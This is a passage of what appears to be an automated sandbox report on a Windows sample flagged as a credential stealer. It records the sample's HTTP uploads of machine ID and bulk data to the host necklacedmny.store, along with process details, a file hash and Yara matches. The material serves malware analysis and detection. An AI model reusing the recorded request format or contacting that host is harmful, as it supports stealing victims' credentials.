                                                                      2024-10-30 07:22:18 UTC1222OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:19 UTC1011INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ibcn57o6cbmtjhbdtl560kho7u; expires=Sun, 23 Feb 2025 01:08:57 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6oTpNnbRB0PtJgURrC1P%2FgQufaX62lWKqe1zfj8WRMOmFyrSMDHa2BErU0p6%2F5FPTc8KTe8tjQP5Pczm0VcyHW6KFAeBNjdnZttK0P3LqLnEhxryjBNk70JYflTgDqVBYK99AM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a7499dd1e7af-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2059&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2141&delivery_rate=1402421&cwnd=78&unsent_bytes=0&cid=e8325383e7ada134&ts=748&x=0"
                                                                      2024-10-30 07:22:19 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649748188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:20 UTC285OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 571731
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ea 4d d0 58 df 04 66 01 c5 4f 02 c5 dd 46 09 31 8a 81 37 2d 8d 1c 3a 11 fb b1 4f b6 4f 08 9c 4d 4a 77 f2 c0 81 66 a5 8d 20 53 74 ac 44 96 53 39 a4 a8 0e 53 25 f8 a5 da c8 e4 fb 98 1a 1e ff 09 21 a5 dd b2 3e ce 5c 28 66 14 4a 78 b1 3c a5 ce 9b de 7f 8f 5a 6d a1 a0 35 0c cb f7 96 02 1b 77 de cf d2 32 4c f1 29 cc 3c 25 6d b3 39 d0 4d 89 d5 e0 2c ca 25 ad 2a d5 8e be c9 f0 e5 e4 0b 91 49 34 c4 9f 08 6e c8 ae 7e bb 09 1b 4a 14 3e 0d 37 c2 c2 fe bf 20 f6 e6 47 51 e5 cf 6a 35 03 22 79 20 71 69 8c 39 f9 f9 12 df 57 a5 a4 2e 2c b7 e1 83 fa 05 24 a0 a1 52 bc d0 af 24 b4 a0 96 81 d2 c9 c9 2e f1 7b 7d 21 0c d9 df b6 8b d9 34 ad d0 de 7a c0 9f d6 c7 cc a9 71 53 0a 39 cb 8a 6c b1 8d 25 93 f6 07 ea bc cf d3 9a 63 ca ee e0 2b 64 15 43 46 2c 39 38 b1 65 df 08 5d 1a 22 3b
                                                                      Data Ascii: MXfOF17-:OOMJwf StDS9S%!>\(fJx<Zm5w2L)<%m9M,%*I4n~J>7 GQj5"y qi9W.,$R$.{}!4zqS9l%c+dCF,98e]";
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 7c 52 da f1 a4 dd 9a e9 d4 b3 76 7e 43 e8 df 99 cf 50 b5 b2 a4 53 8b 96 da bc 14 4f ed 1d 81 5c 68 f2 4b b5 bb 3b eb 75 b1 b5 52 44 e5 e8 9f ed ff 2f 3c 6c 3e 53 88 54 ad bb bc ab b3 9a ee dc 22 a6 f9 67 53 d9 a5 d3 53 2a 47 8c 09 84 1d 5e ef b5 12 48 2b 69 43 77 03 6f f7 d3 e3 14 04 93 ef 42 46 1a 28 d5 42 b5 4e b7 87 bd 66 87 a2 03 8a 82 a3 62 82 9c 11 c8 6a 12 a6 19 61 d9 14 5e 4a c0 b0 24 7b 1e b5 ad aa 25 df ad 33 19 44 fa 37 e1 6a a3 5d e6 f3 78 ee e3 0a 51 08 59 a5 db 3d cf a4 08 10 c6 94 1d e9 51 a1 71 eb 6f 3e 7b 6f 09 2b 53 5f fb 1c ea 83 de 3e 5a bd 43 b1 74 33 69 9b 4a 14 7c 63 52 65 38 c2 3e 37 8c 65 62 b7 7e 8f 6e fd a3 29 c1 69 07 6a ab ba ed 96 66 fe f8 a4 de 90 f3 fb bd 81 32 a3 6b 1e 81 b3 6f df 57 fe 79 50 c2 e6 4c 2f 7f 5e 39 59 67 50
                                                                      Data Ascii: |Rv~CPSO\hK;uRD/<l>ST"gSS*G^H+iCwoBF(BNfbja^J${%3D7j]xQY=Qqo>{o+S_>ZCt3iJ|cRe8>7eb~n)ijf2koWyPL/^9YgP
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 40 52 56 c0 ef 26 3a 5f 75 ea b7 c9 e1 e5 9c b6 f3 9a 57 71 89 e2 07 9f 4f d2 53 97 0a ff ac 41 19 5d c5 1e 38 ca cb 43 3a c7 d2 9a 97 49 8b e7 6f 4c ec 8c 3f 9e ab d7 78 9e 1b 74 d2 22 47 f8 1f 2a 71 5d 69 b4 19 13 d0 f1 d2 64 42 36 dc 8d 66 50 38 3a 56 03 b3 5f 61 3c 7a 75 29 c0 b1 be 49 cd 30 60 9a 9b 3b e4 ec b4 fb 23 61 56 f6 aa f2 28 af 8c a9 d8 4c a2 6a ac 78 71 58 aa 8b 9d 1e dc 66 37 e5 de 11 87 52 01 f0 ce 94 a7 a9 f6 79 5f 48 47 f0 e6 3a 8d 2d de c1 32 5f 4c 18 f3 dc 59 f9 f0 d3 b5 08 2f 2e 35 c8 73 52 95 01 4e 7b d5 f6 2d bd 5d c3 76 85 86 c6 f3 82 1d 79 f2 9b ac 57 62 1f 10 77 0b ce 48 91 0f 1d 41 51 8f 4b 41 e1 1b eb 03 cd 5d f1 af 0f 92 69 92 9b 71 48 f0 ae 23 84 20 06 98 67 94 ef a5 69 b1 f4 79 7d 95 cf 7e d0 47 47 76 9c a4 61 c1 67 c1 d7
                                                                      Data Ascii: @RV&:_uWqOSA]8C:IoL?xt"G*q]idB6fP8:V_a<zu)I0`;#aV(LjxqXf7Ry_HG:-2_LY/.5sRN{-]vyWbwHAQKA]iqH# giy}~GGvag
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 87 2b a1 80 7d c8 8c d2 f8 83 e4 19 b7 63 36 8a 14 d8 bc 43 77 9e 08 f1 7b a2 20 00 bb 6f d6 46 14 d7 f6 34 89 f0 c8 51 fc 5b 97 84 5f 94 19 91 03 b7 21 27 3c 38 30 22 f0 93 5b e8 c3 75 6f ed 68 e2 4c de e5 3b d9 a0 26 70 64 61 e8 53 46 10 24 41 98 d0 ad a8 3a 1b 6f 19 d9 89 34 9c c4 aa a0 c2 ef 13 26 9f 73 69 42 37 b0 dd a1 7c ec b1 89 3f d2 50 e7 b0 de c5 75 84 f7 9e f4 ba e8 ff bd f1 d7 21 35 0b 83 26 fd a9 76 2f 90 7e fe 86 98 2d 22 7d 63 43 59 56 79 74 0a f6 4c ce 2f d6 1d 53 c5 f1 09 1f 7f f8 4e f8 c4 76 2d d9 98 ee 77 a2 52 63 0e 61 a2 7c 42 25 e8 a7 b1 24 90 3c 2e 9a f0 ff 0f d6 ff 2d 66 f4 36 f0 ae 18 e9 b6 35 89 fc 23 a1 a5 a6 fc 08 32 59 8b 9d 97 06 bf 36 d0 fd 85 1e 09 59 3e d8 c8 c3 83 f5 15 27 27 e4 02 19 3b b3 7f 24 02 00 3e 8e 0a 38 95 fb
                                                                      Data Ascii: +}c6Cw{ oF4Q[_!'<80"[uohL;&pdaSF$A:o4&siB7|?Pu!5&v/~-"}cCYVytL/SNv-wRca|B%$<.-f65#2Y6Y>'';$>8
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ca e7 6a 79 38 f3 ad 9e f8 33 dd 6a ad 7a 8d de ae 11 5b 7e 0d c6 ee c3 76 7c 8f 0f d1 7b b2 9d 1c 3a 53 3b a9 f3 37 44 80 d5 58 9a 86 c5 4b 2b 84 6e 0b 6f 59 22 aa 2b ee 0c ac b0 76 e8 c4 fd a4 5a 17 9b 16 47 44 c5 84 46 0a 73 5e fd 4b 6c 23 0e 35 9a 8e 34 24 8a 7d c8 ba 1d 6d 96 04 3a a0 89 82 8b a2 e5 b7 f1 eb d1 c4 d4 8f f2 96 38 f8 9d 20 9e 31 33 ce 87 50 23 12 fb 50 24 25 40 3f 66 f0 bf 48 bb fb df c6 4a 4d 12 c4 7e ef aa c3 8c 90 d8 a1 c3 44 4b 30 74 8c 00 e0 68 00 9a 22 7a 05 cc 3f 6a 6f f7 d4 79 70 1c 38 bd b8 29 e9 d4 af 8b a0 6d 23 29 34 35 88 0b 75 dd 3d c4 08 0b 12 1c 04 f7 eb 28 12 80 c1 1b bd 78 6b be 55 06 4c 5c 58 d7 66 b5 0b 4f d2 70 28 29 cc 5f 98 68 10 e5 b0 40 d9 91 6a 61 ee 5e 7e d6 13 ff 97 8c d2 75 e7 ee b9 3f 4a 35 23 07 7f dd d1
                                                                      Data Ascii: jy83jz[~v|{:S;7DXK+noY"+vZGDFs^Kl#54$}m:8 13P#P$%@?fHJM~DK0th"z?joyp8)m#)45u=(xkUL\XfOp()_h@ja^~u?J5#
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 6f 90 fc 43 89 fb 56 b0 81 e1 b1 cc a2 d6 da 2a d9 3f b7 a1 a8 a9 4c 89 71 02 7e e1 68 79 d3 59 09 25 b9 31 b7 51 95 77 d7 d2 b2 65 53 88 e0 2b 94 bf 04 a0 ef e5 36 c1 99 48 42 5c 32 2f f7 fc 9d 76 9e 7c 7e 3b 99 73 fa fe 46 7c 56 d2 84 6e 35 2b 2b 3e eb 75 32 55 04 e4 7d fd 1e 91 3e 6c 63 40 1e fd 00 87 f8 e0 cb 8e 31 b5 d6 69 17 09 56 f7 9b 83 f0 92 0e e5 cf 92 aa 63 43 13 b0 a3 aa c0 7e b5 e4 4e 7d 85 e0 05 a0 9a c6 64 e5 cc 30 af f2 49 dd 7a b7 52 c7 fb dd 44 79 80 6f c8 4d a1 12 af 9c 27 c3 d1 7b 94 5f 89 82 47 06 33 ab 75 2d 48 ef 31 b4 f8 eb 5b 7b 8d 71 58 a8 75 d8 ea 6c 90 1e 9b 25 f8 9c c5 d2 e0 7d 58 24 6d e4 e6 af ad 09 a4 f6 eb d6 e8 f2 53 66 39 ee fd dd d3 4a 8f 71 b7 88 43 eb ec 2c 85 55 77 61 41 e6 46 0e 3a ba 3e 51 c9 ae f0 9f 7f fe 75 03
                                                                      Data Ascii: oCV*?Lq~hyY%1QweS+6HB\2/v|~;sF|Vn5++>u2U}>lc@1iVcC~N}d0IzRDyoM'{_G3u-H1[{qXul%}X$mSf9JqC,UwaAF:>Qu
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ea 23 12 3f b4 61 13 d8 fc ac 04 b6 83 64 bf 32 4d 4f 88 dd 1b 9c da 98 07 a1 9c 64 c1 dc fd d2 80 d2 60 76 4b b7 73 84 d9 38 d4 90 f8 08 c9 65 af 36 13 cb a2 d9 e7 7e 00 fc 5c b5 c6 41 35 aa 8f 7f d4 4b 76 bb f2 f2 ae 84 0c 28 43 a0 04 53 d2 ad c2 b2 86 48 ac 47 77 24 35 d8 27 04 66 8b aa 8f b2 0c 0d ae be 54 7b 80 a4 8a 74 be da c2 16 56 ef df 18 8a 1d d3 3a ac 3b 36 24 4c 90 a2 ef 93 be 0b 65 10 37 5e 53 04 26 5c 05 c6 14 b0 9c dc c2 21 ed d1 8e 9a d3 c1 4e 3a 44 3c d0 d4 10 fe 8b 97 82 3f 3d 28 f8 24 92 6f 8e c8 09 53 de a4 07 b1 cd d9 e9 cb 21 31 35 ef 53 25 9a 51 58 c2 63 6a a5 6a 68 f3 2d ad a7 11 c5 7a 91 82 6d 41 df 7c 3e 04 2d 72 02 4f 6d 9c fd 0f a9 59 a6 b0 51 5e 4c a4 4e b7 8e 26 dd ca fe dd 62 5d 38 bf 62 b9 77 e8 7a be a1 4e 18 e3 cb 23 3e
                                                                      Data Ascii: #?ad2MOd`vKs8e6~\A5Kv(CSHGw$5'fT{tV:;6$Le7^S&\!N:D<?=($oS!15S%QXcjjh-zmA|>-rOmYQ^LN&b]8bwzN#>
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 52 f2 b7 81 a4 58 f1 cc 7b 74 c9 ff 1a a5 3b 62 60 47 69 9d ff 0f 4d 3c 8c aa fc 94 50 1c bf 2b b9 41 f5 ae 69 70 5a 61 55 e6 3e 9c 55 0a a3 62 55 20 c6 c1 77 1c df d1 43 eb e9 a7 0b d5 f1 d7 68 5a 53 da af e6 9f ac 91 c3 e1 25 d3 69 85 83 2d e6 41 8c e6 a2 63 eb 13 e7 be 73 a3 8c a3 01 08 2b 7a f9 ad c6 f5 7f 47 e5 d7 11 74 69 c2 80 38 80 e1 f0 9d 09 d2 5e ed 58 67 ea 3b 40 e6 65 1f 4b 4e 4d 81 f1 9b 8b b2 9a 05 bf f8 e9 81 ff 9c 22 7d 0e 4b 0a 51 17 8d 60 58 49 90 9d 88 73 ed a6 a8 ee 48 fa 59 54 aa 1f 1b ff 07 dd 1f 05 b6 44 d9 ed 52 92 01 1d 75 a7 57 95 14 fe 39 93 1a c7 3c ed f0 33 52 58 e6 80 e0 37 45 f9 74 aa ff f6 e9 8a 71 23 34 97 ad a6 6d 59 82 9c 03 d5 bd f8 b4 1b 68 c1 d6 31 7a 6b 19 90 5a 45 4f 9a f5 a7 78 93 5a 78 7f 9f ae 71 51 5d 6a d2 a3
                                                                      Data Ascii: RX{t;b`GiM<P+AipZaU>UbU wChZS%i-Acs+zGti8^Xg;@eKNM"}KQ`XIsHYTDRuW9<3RX7Etq#4mYh1zkZEOxZxqQ]j
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 8f cc 66 90 3b 31 57 fd 61 dd e7 1b 94 b3 cc c6 31 3f 4e 3e 3f 11 86 05 0a f4 21 c1 58 23 d9 4c f9 61 85 e7 f4 12 2c be 31 47 73 cd 5d 28 51 0a e7 24 75 0c 58 61 c9 98 b9 c3 0d 43 6d d0 db da 7b 13 0e b1 06 6d 3b bd 68 76 ad 1d 62 7b 2a ba c5 61 27 16 84 c8 f9 65 13 ce 26 d1 54 5d 8d 92 ed a5 80 39 4b d9 e0 69 b6 90 28 21 53 67 f3 d6 49 0f 70 d1 32 b3 6c 49 14 70 9d ee f7 ae 91 46 fa 40 6f c6 26 cb f5 6d 08 f5 75 aa 26 94 61 6a ac bf 8d 5f 2e 22 17 5c 08 fa f2 43 f8 a6 d2 3e d6 cf 47 54 54 94 fa 01 9e 2d 34 bb 7d 67 40 11 53 a5 f2 2a 4a f7 17 8a bf 20 76 04 8f a8 fa 20 05 a3 22 a3 e3 74 44 4e ec a4 64 38 14 0e f6 47 8d 54 05 80 7d 13 6c 1e b0 87 c5 fd 67 f1 c9 05 dc ed 9c 66 4f 64 3e e1 df 19 77 7d 8d 31 34 b6 5c 3d da cf 2f c4 19 e7 e4 b7 1c d8 46 06 ad
                                                                      Data Ascii: f;1Wa1?N>?!X#La,1Gs](Q$uXaCm{m;hvb{*a'e&T]9Ki(!SgIp2lIpF@o&mu&aj_."\C>GTT-4}g@S*J v "tDNd8GT}lgfOd>w}14\=/F
                                                                      2024-10-30 07:22:21 UTC1031INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=covoedllqs2gi005e0salnhnrl; expires=Sun, 23 Feb 2025 01:09:00 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyjjPBOQPrsP6rPZg492%2FYcMW2wO0ZQ6l1Q5Ao6HBurTOj%2Fe9%2B0eu0D%2BB8wG6kWZSH7UGSKdIK%2BEAY7zXPe2VoV4hp%2Fs%2BG5Y0PCdZNebZLSyjOOUD7wwlP61kY%2FL9jaBGLspIRI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a754bf98e70a-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1509&sent=219&recv=613&lost=0&retrans=0&sent_bytes=2846&recv_bytes=574280&delivery_rate=1895287&cwnd=243&unsent_bytes=0&cid=531f9f7d2d863e21&ts=1817&x=0"


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:03:22:06
                                                                      Start date:30/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x6a0000
                                                                      File size:2'958'848 bytes
                                                                      MD5 hash:65AF596C495031434154EBB5E6EB462F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Disassembly

                                                                      No disassembly